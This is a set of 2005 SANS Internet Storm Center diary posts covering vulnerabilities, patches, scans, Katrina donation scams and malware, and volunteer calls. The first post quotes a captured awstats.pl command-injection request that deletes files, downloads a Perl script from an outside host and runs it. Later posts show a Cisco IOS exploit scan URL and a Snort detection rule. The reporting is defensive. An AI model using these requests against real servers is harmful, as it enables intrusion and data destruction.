Andy Green reported that his server received a scan for the vulnerable awstats.pl script, even though the script was not actually present on his server:
[04:06:01 +0100] GET //awstats.pl?configdir=
|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20members.lycos.co.uk/mariusbou/a.txt;
perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1 404 287 -
In an unrelated post, Jakob Staerk reported receiving crafted ICMP "time exceeded in transit" packets hitting his server:
16:18:29.282413 IP (tos 0x0, ttl 243, id 5715, offset 0,For additional information about these issues, please see the corresponding DShield posts. (Note that the long lines above were wrapped for readability.)
flags [none], length: 56)
219.158.8.221 > xx.xx.xx.xx:
icmp 36: time exceeded in-transit for IP
(tos 0x0, ttl 1, id 6520, offset 0, flags [DF], length: 48)
xx.xx.xx.xx.11582 > 222.168.227.212.80: [|tcp]
0x0000: 4500 0038 1653 0000 f301 474b db9e 08dd E..8.S....GK....
0x0010: xxxx xxxx 0b00 b1c1 0000 0000 4500 0030 xxxx........E..0
0x0020: 1978 4000 0106 1828 xxxx xxxx dea8 e3d4 .x@....(xxxx....
0x0030: 2d3e 0050 6a78 ab37 ->.Pjx.7
0 Comments
A TWiki Vulnerability Allows Remote Code Execution
To learn more about this problem, and to download a patch, go to:
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev
TWiki is a popular web-based collaboration tool. If you have it installed, we urge you to patch it as soon as possible. We are expecting to see a worm that exploits the recent vulnerability pretty soon.
Chas Tomlin provided us with the following Snort signature, which he put together with help from others:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE WEB twiki rev access"; flow:to_server,established; uricontent:"/bin/view/Main/TWikiUsers?"; nocase; pcre:"/rev=\d+%20/i"; classtype:web-application-activity; reference:url,secunia.com/advisories/16820/; sid:2002366; rev:2;)
This rule is also available from the Bleeding Snort website.
0 Comments
Are you being harassed or stalked online?
We received an email today from someone who is concerned
that they are being harassed by someone online. The
individual was asking the Handler's group for help in
finding someone to help her track down an online
attacker.
I wanted to address this issue here. I have investigated
similar claim in the past. Without getting into much
detail about the particular incident (to protect the
identity of both the innocent and the guilty) I want to
discuss my response to those who are concerned about
Cyber Harassment and Stalking.
Is it possible that someone could accomplish this?
Absolutely. Is it likely? - Not under normal
circumstances.
A lot of things could be happening behind the scenes.
* You may have spyware or viruses on your computer that
are allowing certain confidential information to leak
out.
* You may have given someone more information that you
should have in a chat room or email.
* You may have an unprotected computer with lack of
sufficient protection (firewall,anti-virus program,
operating system updates, etc).
In the case that I investigated - the "victim" claimed
that they knew who the people were that were
responsible. There was no evidence that anyone had done
anything to the computer. Nothing more than the
installation of the normal - run of the mill spyware and
adware was found.
It is highly unlikely that this type of activity is
taking place. What is more than likely taking place is
what we see evidence of everyday at the Storm Center and
elsewhere on the Internet. Take a look at the Internet
Storm Center - you will see referenced the Survival Time
and a link to the Survival Time History. The Survival
Time right now - today is 23 minutes. That means that a
computer - unprotected with no firewall, anti virus,
spyware/adware protection will likely become infected in
just 23 minutes. That is all the longer it takes to
compromise a brand spanking new computer - out of the
box. Now take a look at the History link. You see that
we had less than 10 minutes in May 2004 and less than 5
minutes in August 2004 (Blaster).
Take a look at the Top 10 Ports and you will see that
there is continuous port activity. That is the nature of
the Internet with 65,565 ports available you are bound
to see some of them alive doing things like pop mail
(110), web (80), DNS (53), etc.
So what can you do to protect yourself and your
computer?
Here is a link to the Survival Guide. This document
will help you put the things in place to minimize the
potential for someone to break into your computer.
http://isc.sans.org/presentations/xpsurvivalguide.pdf
What do you do if you think you are being harassed?
Don't jump to conclusions.
Contact your local Police Department or your local FBI
office. They can investigate your issues and if they
suspect that you do have a problem they can conduct a
full investigation.
Don't give out personally identifiable information
either online or by telephone if you did not initiate
the contact. Use caution when sharing information with
others - even if you did initiate the contact. Give
only the information that is essential to complete the
transaction or enquiry.
Only you can protect yourself and your identity.
0 Comments
Where does all the data come from?
Take a look at the Flash Movie that our own Dr J. put
together. This shows where the data that has been
received at the Dshield Database server in the last 5
minutes originated from.
http://isc.sans.org/packetattack.php
(I particularly like the representation of the data
received from the US - it appears that Johannes too
understands that Iowa is indeed the Center of the US.)
0 Comments
Free time?
For example, last year I looked for a solution to monitor the changes to a Windows file share. I needed a report at the end of the day showing new files, deleted files, etc. This would allow me to detect security policy violations in an automated fashion. I couldn't find anything free or commercial to do it, so I rolled my own in Python and SQLite (a light-weight database engine). Interestingly, I discussed my project with several Windows system admins and none had ever thought about monitoring a file server in this manner.
Be sure to include whether you would allow us to reprint the code or description of the code on the site.
0 Comments
Multiple Linksys WRT54G Vulnerabilities
The iDefense advisories are here:
iDefense advisory 304
iDefense advisory 305
iDefense advisory 306
iDefense advisory 307
iDefense advisory 308
0 Comments
Microsoft Windows Update Errors
Two of our handlers noticed some weirdness with Microsoft update.  See the image.
Update (handler Kyle Haugsness):  Several people have responded with proposed fixes.  Unfortunately, they are all different.  The suggestions are diverse: disable all anti-virus (especially Norton and McAfee), re-install Internet Explorer, delete the Internet Explorer cache, re-install XP service pack 2, flush the DNS cache, and log-in as local administrator.
So the moral of this story is: several people seem to be having the problem occassionally and if this is affecting you, good luck in figuring out the right approach.  This one seems to have no consistent cause or solution.
        
0 Comments
MacOS X Java patches
The downloads are available at Apple Support Download.
Scott Fendley, Handler on Duty
0 Comments
Security Mailing Lists for Academia
There are 2 major mailing lists that are the primary resources for security discussions in this microcosm: Unisog and Educase Security.
First is the Unisog mailing list. Unisog stands for UNIversity Security Operations Group, and this group was created out of excellent discussions ocurring after hours or in the hallways at a SANS conference (correct me Unisogers if it was another conference). It has been around for a number of years and has some very knowledgeable people involved and is usually more technical in nature. For more information on this mailing list, please see Unisog mailing list information located at lists.sans.org.
Second is the Educause Security Discussion Group. Educause was formed in the late 1990s by two professional associations with a mission to advance academia by promoting the intelligent use of IT. A few years back, Educause formed an IT security discussion group to promote awareness, security solutions, effective practices and in general discussion for those in higher education. In general, I see a policy and administrative level discussion on this list. This is a great resource to see what your peer institutes are doing, and not have to re-invent the wheel on the more upper level details. For more information on this mailing list, please see the Educase Security Discussion Group information.
In general, both of these mailing lists are an excellent resources. There is no reason that those of us that work in the university community have to "re-invent the wheel" on any of our projects no matter if it is technical or administrative in nature.
----
Scott Fendley
Handler on Duty
University of Arkansas
0 Comments
Microsoft Releases Updates
Microsoft did release a couple of updates today nonetheless.
First, the monthly "Malicious Software Removal Tool" was updated to handle new variations of some new and old pieces of malware. For more technical details, please go to Microsoft KB Article 890830 for information and a link to the manual download location.
Second, Microsoft released an update for Windows 2000 SP4 Update Rollup 1. That would make this, "Microsoft Windows 2000 Service Pack 4, Update Rollup 1 version 2." Now that is a mouthful! For those that don't remember, Update Rollup 1 was originally released in June 2005. This version appears to fix some known problems with the original version that were discovered after the update went out for testing. For more information please see Microsoft KB Article KB891861.
I have not found any other updated patches or anything else noteworthy on the Microsoft front today. If I missed something else, please let me or the other handlers know.
----
Scott Fendley, Handler on Duty
0 Comments
Snort Denial of Service Vulnerability
Earlier Monday, Snort.org announced a vulnerability in the 2.x series of open source IDS software. The vulnerability was found in the PrintTcpOptions() function and could allow an attacker to use a malformed, crafted TCP/IP packet to cause a DoS in Snort. These vulnerabilities involve NULL pointer dereferences which should mean that only a Denial of Service is possible.
JustinF noted earlier today that the original advisory that I grabbed from the snort.org site was not completely accurate. You _do not_ have to be running snort with the -v flag set as there are other execution paths that lead to the PrintTcpOptions() function. Noteably, the PrintIPPacket() can be used to call the vulnerable function. This requires you to jump through a few requirements like the packet can not be a fragment[1], and its protocol is TCP. (For those looking at the code from cvs, this takes a couple levels of following the code to see this connection.)
Justin noted that using the "-A fast", those logging in ASCII mode, and the frag3 and stream4 preprocessors have some potential to get one to the PrintTcpOptions() as well as the initially reported -v flag.
He also noted that there are several bugs in PrintTCPOptions() which is apparent by the changes made to the source which includes nearly all of the TCP options, not just SACK.
Thanks Justin for looking closely at the code and bringing it to our attention.
Fix and Workaround Details:
A fix for this vulnerability was checked into the Snort 2.4 CVS tree on August 23rd, 2005 and is available for download here. This fix will also be included in the upcoming 2.4.1 release.
Proof of Concept Released:
In addition, proof of concept code has been released concerning this vulnerability.
References:
Snort News
VulnFact Advisory
FRSIRT Bulletin
------------
Scott Fendley, Handler on Duty
0 Comments
WebCalendar Exploitation
We have had reports submitted that web servers running WebCalendar 0.9.x or WebCalendar 1.x are being exploited. Currently some of defacer/cracker starts using WebCalendar php remote injection vulnerability. They are using when defacing web site, uploading Trojan and others. I saw some of defacer group use this kind of method then uploading Trojan which steal bank id/pw from user’s system.
Official WebCalendar releases can be obtained from the SourceForge development server. The latest version is 1.0.1, please update to latest version.
Secunia Vulnerability description - WebCalendar "includedir" Atbitrary File Inclusion Vulnerability
SecurityFocus Vulnerability description - WebCalendar Send_Reminders.PHP Remote File Include Vulnerability
Kevin Hong
Handler On Duty
0 Comments
Larger Power Outage in Los Angeles
LA Times Story
0 Comments
New Bagle variant
Subject : No Subject
Contents : new price or price
Attached file : new_price.zip (12490) or price.zip (12498)
new_price.zip : c3954e35d8b9b3a63d42c5718ed1624d
price.zip : c16ddcef3b01f1ec46750f7a1991ee91
Inside of zip file : 1.cpl (14340) or price.cpl (14340)
1.cpl (4fb426de872ee9b20c3312fae3adf018)
price.cpl (951053055f16d331a42475c209803430)
Kevin Hong - khong at kisa.or.kr
Handler on Duty
0 Comments
Firefox 1.5 beta 1 released
Firefox version 1.5 beta out
You can get from here : FireFox 1.5 Beta 1
One of our readers, Matthew, submitted that there is a new version of Firefox available for download. The latest version of the Firefox web browser, 1.5, is out in beta 1. After personally installing it earlier today I have found it be incredibly stable and feature rich. According to Mozilla, Firefox 1.5 beta 1 is still vulnerable to the IDN buffer overflow vulnerability published on Sep. 8th. It is highly recommended that all users take the steps indicated in the link below to secure against this vulnerability.
Patch information
https://addons.mozilla.org/messages/307259.html
Tony Carothers
Handler on Duty
0 Comments
impad4d Vulnerability & Patch Released
Patch Link
http://savannah.gnu.org/patch/index.php?func=detailitem&item_id=4407
Vulnerability Link
http://www.idefense.com/application/poi/display?id=303
GNU Mailutils information
http://www.gnu.org/software/mailutils/mailutils.html
Tony Carothers
Handler on Duty
0 Comments
Firefox Vulnerability
0 Comments
Netscape URL Domain Name Buffer Overflow
0 Comments
Family News Network of the ICRC - Hurricane Katrina
However, note that the ICRC has no means of verifying the information sent through the network and thus cannot accept responsibility for any inaccurate information made available on the website.
You can find more details at http://www.familylinks.icrc.org/katrina.
Thanks to Melvin.
0 Comments
AT&T Network Outage
0 Comments
MS Black Tuesday?
Next week, we will have just one Micosoft Security Bulletin to be relealed on the monthly security bulletins. But, it is rated as critical, which will deserve attention.
Our good reader Juha-Matti sent this to us:
According to Security Bulletin Advance Notification Program page Microsoft will release one monthly security bulletin and it is affecting Windows. The highest maximum severity rating for this update is critical. Company says that these updates may require a restart to take effect.
Additionally, like typical, they will release an updated version of Malicious Software Removal Tool on Windows/Microsoft Update, Windows Server Update Services and Download Center.
0 Comments
New Firefox Vulnerability
Something nice to start a friday morning...
An unpachted vulnerability was disclosed today in Firefox browser. According the advisory, "...the vulnerability is caused due to an error in the handling of an URL that contains the 0xAD character in its domain name. This can be exploited to cause a heap-based buffer overflow.
Successful exploitation crashes Firefox and may potentially allow code execution but requires that the user is tricked into visiting a malicious web site or open a specially crafted HTML file."
Lets hope for a quick patch!
You can check the original advisory at Security Protocols and Secunia
Thanks Pat for pointing this out.
-------------------------------------------------------------------
Handler on Duty: Pedro Bueno < pbueno $$ isc . sans . org >
0 Comments
Cisco content switch SSL vulnerability
http://www.cisco.com/warp/public/707/cisco-sn-20050908-css.shtml
The scope appears to be limited. You must be using certificate authentication and the CSS must be the SSL server. In the affected cases if ssl fails to renegotiate a session at the appropriate time it may be possible to bypass authentication. Those using SSL are strongly encouraged to upgrade as soon as possible.
0 Comments
After 24 hours of fun we are back online!
0 Comments
Major Cisco IOS Vulnerability Announced
The affected versions of Cisco IOS are 12.2ZH, 12.2ZL, 12.3, 12.3T, 12.4, and 12.4T (all versions). The vulnerability will not affect devices that are not configured for Firewall Authentication Proxy for FTP or Telnet Sessions. There is a rather large table of remediation options that is included with Cisco's advisory. FrSIRT and Symantec have this listed as a high risk alert. Either turn off the authentication proxy or patch your devices as soon as possible.
0 Comments
ISC/DShield Network Downtime
most of the connectivity has been restored, but the site is still sluggish. Our ISP (Sprint) is currently working on a resolution.
0 Comments
Cyber-Looting update
In particular our handler Tom Liston is tirelessly verifying hurricane related URLs to find new cyber looters. In a couple cases, we found well meaning URLs, which are indistinguishable from fake "cyber looting" sites.
If you registered a URL related to Katrina and are collecting donations, please identify which 501(c) you are associated with and provide contact information. If you are using a personal paypal account, please consider that by collecting the money and passing it on to a charity, you will lose whatever commision paypal is charging you. It may be more efficient to just link to the chartiy of your choice.
Just to illustrate the problem, here a graph showing the number of 'katrina' domains registered over the last couple days 
    
0 Comments
Continued great response to call for Volunteers
Please use our Contact Page to sign up. Do not upload Word documents or PDFs, but please just include details in plain text.
0 Comments
New Diary Format
Starting with this diary, we will no longer create one daily diary, but instead one or more "story". Each story may be created by a different handler, and some stories may span more then one day. This will allow us to keep thoughts together for events that last more then one day.
In addition handlers have now a nicer editor to create diaries, allowing for more formating options. For example, we can now include images and tables.
Old diaries will remain 'one story'. We may break them up in the future. Soon, you will be able to compare different versions of a story as it may change.
0 Comments
Volunteer Response; OpenSSH issues; Bluetooth delay
Volunteer Response
I've spent most of the day updating the contact database of people volunteering to help out with the Red Cross kiosk project, see http://isc.sans.org/diary.php?date=2005-09-04My fingertips are are still warm-- but it's a good pain.
OpenSSH issues
An update to OpenSSH, version 4.2p1 was released addressing issues with GSSAPI and port forwarding. You can grab the latest here: ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/More on the vulnerabilities:
http://secunia.com/advisories/16686/
http://www.securityfocus.com/bin/14727
http://xforce.iss.net/xforce/xfdb/22115
Bluetooth delay
When I last posted, I mentioned performing a bluetooth audit of a disaster drill. I received few questions on what I did to perform the audit. Sadly, today was spent hopping between Storm Center work and Red Cross work, so I don't have the promised article ready yet. Perhaps my next shift...0 Comments
Call for Volunteers ; Red Cross Associated Sites ; Katrina Related Fraud Continues
Call for Volunteers
The Red Cross needs volunteers with system administration, network engineering and information security (infosec) expertise to assist in the design and implementation of a network of Internet kiosks. These kiosks will be deployed to all of the Red Cross shelters to be used be people displaced by the hurricane and flooding to report that they are alive and to try to contact others.The Red Cross will be requiring a great deal of help to stand up the infrastructure as well as to actively safeguard it from eventual infection attempts from bots, worms, viruses, spyware and other sorts of malware.
Once we have accurate point-of-contact (POC) information for the Red Cross for this, we will post it in the ISC diary so folks can contact the Red Cross directly. In the meantime, if you are interested in helping the Red Cross in this challenge, please submit your contact information and availability to the Internet Storm Center here and we will pass your information on to the Red Cross. Please provide your name, location, phone number where you can be reached, and an email address. Also, a short list or summary of the skills you can provide.
SANS and the ISC would like to encourage folks with GIAC certifications and a desire to volunteer to help out the Red Cross with this effort. Even if this specific method of assistance is not feasible for you, any way in which you can assist the Red Cross, either nationally or in your local chapter, or perhaps assist another charitable organization such as the Salvation Army or local organizations, would be greatly appreciated at this time.
For more information about this technical challenge the Red Cross is facing, please see this article from the Washington Post.
One other request - the Shared Resources High Frequency Radio Program (SHARES) at the US Department of Homeland Security is looking for assistance from the amateur radio community to assist in running SHARES stations. According to a note from SHARES, "...we always can use more SHARES operators in additon to the 1,200 we already have in our databases. We definitely could use more SHARES stations directly in the affected area, such as New Orleans, Baton Rouge, etc. Have them at key places, such as EOCs, refugee camps, logistic centers are all smart ideas." Contact information for those able to assist is at http://www.ncs.gov/n3/shares/contact.html
Red Cross Associated Sites
The Red Cross has posted a list of official cash donation sites for businesses and organizations affiliated with the Red Cross. This list is not all-inclusive but can be used as a starting point.Katrina Related Fraud Continues
We continue to see more and more new web sites popping up proclaiming to be a charitable organization who is collecting donations for folks affected by Katrina. While there are some valid new sites out there, by far the majority of these continue to be nefarious in nature, setup by folks just out to make a quick buck.If you wish to make a donation of cash or materials to help folks impacted by Katrina, I would recommend you provide your donations to an older, established organization and not to one formed in the last week. While there are valid new charities out there, they are quite possibly just learning how to deal with the distribution of the donations. An established organization should already have procedures, contacts and experience for dealing with the distribution of donations.
---------------
David Goldsmith
dgoldsmith at sans.org
0 Comments
New Windows update; Katrina information still flowing
Windows Update
One of our readers, Thomas, submitted this morning that Microsoft has released a new update. This update applies to Microsoft Windows XP Service Pack 2 (SP2) or Microsoft Windows Server 2003 Service Pack 1 (SP1). This patch fixes a condition where an exception may not show up in the Windows Firewall GUI, if this exception is created by modifying the registry directly. In order to do this, administrative priveleges are required on the box. The danger in this flaw is that a hacker could open a backdoor that would not be shown in the GUI Firewall ruleset. Just a side note, MS is not calling this a flaw, but an "unexpected behavior".Article Link
http://support.microsoft.com/kb/897663
Download link
I will be adding new information as it comes in today regarding ways to help the hurricane victims. For now, please take a look at Jim Clausing's excellent write-up yesterday.
http://isc.sans.org/diary.php?date=2005-09-02
The last word
I'd like to give thanx for the help today, and give credit to all those that have been working hard to curb the fraudulent websites popping up.
Thanx to all the other Handlers, including Tom L., Lorna H., Scott F., Dr. J., Marcus S., Patrick N., and the rest of the Handlers. I'd also like to give a *big* thanx to the ISP's out there who've done some 'creative' clean-up on these sites as well.
Thank you!
Tony Carothers
Handler on Duty
0 Comments
IT Help for Katrina victims; More Katrina Malware; Gas shortage hoax e-mail; MS05-043 exploits in the wild?; Scanning for old Cisco vulnerabilities
IT Help For Katrina victims
We did get requests from a number of people who would like to help any way they can. If you know of any web sites where people can offer help, or ask for help, let us know. We will setup a page with links to various sites. If you are in need of IT assistance, or if you would like to provide some, let us know and we will try to match up helpers and people in need. FEMA has a listing of organizations that accept cash donations as well as materials/volunteer contributions: http://www.fema.gov/press/2005/katrinadonations.shtm . UPDATE: (23:25 UTC) One organization that we've been made aware of that is in need of people with technical skills is part-15.org. They are apparently coordinating the FCC/FEMA efforts to reconstruct the communications infrastructure in the disaster area. They have a need for systems integrators and network engineers, see http://www.part-15.org/emergencyrelief/katrina.html Another one that we've been made aware of that is coordinating relief activity for educational institutions (not limited to technical/IT) is Educause.END UPDATE Our handler Kevin notes: "For those that are action oriented, contact your local chapter of the American Red Cross (use the "find your local chapter feature" here: http://www.redcross.org/services/disaster ) and talk to their volunteer services coordinator. They will enter you into their training program (I know that a lot are accelerating the training for national responders now.) There is plenty of geek-work to be had setting up the communications network to link LANs, wireless, satellite, VoIP, etc. Just be willing to give them three weeks of your life." Do not travel to the disaster area without coordinating with one of the relief agencies first! See http://www.fema.gov and http://www.redcross.org for information on making donations/volunteering. UPDATE: (17:20 UTC) We received several notes about e-mail purportedly from the American Red Cross, but pointing to arc.convio.net possibly being a scam, this is not the case. They (Convio) are handling online donations for the Red Cross, though they apparently had some problems yesterday. We also received a note from Mike in the InfoSec group at the American Red Cross, asking that any e-mail or web sites that look like they might be scams trying to use the Red Cross name, be forwarded to infosec@usa.redcross.com.
END UPDATE
More Katrina Malware
The latest malware spotted uses the subject line: "Is Government Reaction to Katrina Because of Loss of Life, or Loss of Property?". A link in the email will lead to the malware.Gas shortage hoax e-mail
There is a hoax e-mail making the rounds about a gas shortage. Don't run out and create a shortage. And now, we have reports from one of our readers (thanx, Rikki) who is seeing e-mails about a gas shortage floating around. The facts are, yes, there have been gas stations that have run out of gasoline. That is mostly because people have flocked to them to fill up fearing a shortage (can you say self-fulfilling prophecy?). Yes, some refining capacity in the US has been impacted by the hurricane, but we won't know the impact of that for some time yet. In the meantime, there is gasoline available in the US, and stations are still getting deliveries. Yes, the prices have gone up and conserving would be a good idea, but there is no evidence of an imminent widespread shortage outside of the areas that suffered direct infrastructure damage earlier this week. Remain calm.MS05-043 exploit in the wild?
We are hearing about possible exploits to the vulnerability described in MS05-043 (the print spooler service) in the wild. If anyone has captures of such a beast, plesae share it with our malware group. In any event, since Microsoft rated this vulnerability as a critical, I hope everyone is patched by now (a guy can dream can't he?).Scanning for old Cisco vulnerabilities
We started hearing reports last week of machines scanning web servers looking for an odd URL. The GET request is
    GET /level/16/exec/-///pwd  HTTP/1.0
This scanning is apparently picking up steam.  We're not sure exactly why this is increasing since this exploit is for a Cisco vulnerability from 2001, so hopefully, most routers out there have long since been patched against this one (and a number of others that have come after).  Also, our usual advice for practicing defense-in-depth suggests that, a) if you don't use the http management feature of the router, turn it off; and b) if you do use it, it should only be accessible from a protected management network.
Happy Labor Day
For those of you in the US, I hope you have a happy, uneventful holiday weekend.-----------------
Jim Clausing (with mucho help from the other handlers, thanx gang)
Chief Bot Herder
0 Comments
Katrina Malware; Katrina Donation Scams (now with domain name list); Dameware
Katrina Malware
It didn't take long. This morning, we received an email which is promissing news about the Hurricane. However, the site it links to appears to provide malware in addition to a brief news article. The text of the email (the original is in HTML):Subject: Re: u1 Katrina killed as many as 80 people. Just before daybreak Tuesday, Katrina, now a tropica l storm, was 35 miles'Read More..' links to nextermest.com [DO NOT VISIT! MALWARE!]. We are currently analyzing this page. It uses obfuscated javascript to download what looks like a .hta exploit.
northeast of Tupelo, Miss., moving north-northeast with winds of 50 mph.
Forecasters at the National Hurricane Center said the amou nt of rainfall
has been adjusted downward Monday. Mississippi Gov. Haley Barbour said Tuesday that Hur ricane Katrina killed
as many as 80 people in his state and burst levees in Louisiana flooded New
Orleans. Read More..
Katrina Donation Scams
A couple of the domains we discovered yesterday removed the paypal button. Again, please let us know if you find any suspect domains. There are now about 230 .com domains that contain the strings 'katrina' and 'hurrican'. We could use your help checking out domains we found that 'sound suspect'. These have been filtered from the .com zone file using keywords like 'katrina'. Lots of innocent domains, so don't use it as a block list just yet. We are trying to anotate this list as needed. NOTE: If you send us an anotation to add, we will add an e-mail address of yours to 'sign' the comment. The email address will be obfuscated. Unsigned comments come from our ISC handler team. http://isc.sans.org/katrina.com.txt Susan Bradley had this nice remark about "cyber looting" on the patch management list: "to the folks behind this one....sick guys....really sick... you know how much small businesses are going to need geek/IT help in the coming months and all you guys can do is to code up stuff like this? How about donating to the red cross? How about volunteering to help a small business owner displaced by Katrina reset up MX records, A records? How about doing something useful instead of this stuff? Okay rant box off"Dameware Exploit
We do see pretty stong scanning for the recent Dameware exploit. The Dameware.com site is located in New Orleans and not reachable since the storm. However, you can download the latest version from the UK site: http://www.dameware.co.uk/thankyoudownload.asp?group=Downloads(thanks David for the UK URL). --------
0 Comments

 
              
0 Comments